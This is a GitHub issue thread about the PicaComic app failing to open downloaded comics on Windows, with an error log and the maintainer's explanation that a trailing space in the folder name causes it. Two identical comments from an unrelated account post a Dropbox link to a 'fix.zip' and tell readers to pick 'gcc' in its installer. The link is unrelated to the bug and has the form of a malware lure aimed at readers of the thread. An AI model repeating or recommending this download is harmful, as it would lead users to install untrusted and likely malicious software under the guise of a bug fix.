### ISSUE TITLE
[Bug]: 下载文件无法打开

### ISSUE THREAD

**Issue by mingyueranxin** [wgh136/PicaComic#628]
### 描述/Description

尝试打开以前的下载文件，但点击阅读一直在加载页面

### Version

4.01

### 使用的操作系统/Operating system

Windows

### 日志/logs

PathNotFoundException: Directory listing failed, path = 'D:\manga/乳と眼鏡とエトセトラ 乳與眼鏡與其他性癖 無修正 /1\*' (OS Error: 系统找不到指定的路径。
, errno = 3)

### 截图或视频/Screenshot or video

https://github.com/user-attachments/assets/13374769-ab2a-4098-9b26-5e77666e8b04

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by wgh136** [comment]
末尾有空格导致的, windows api会在创建或重命名目录时移除末尾的空格
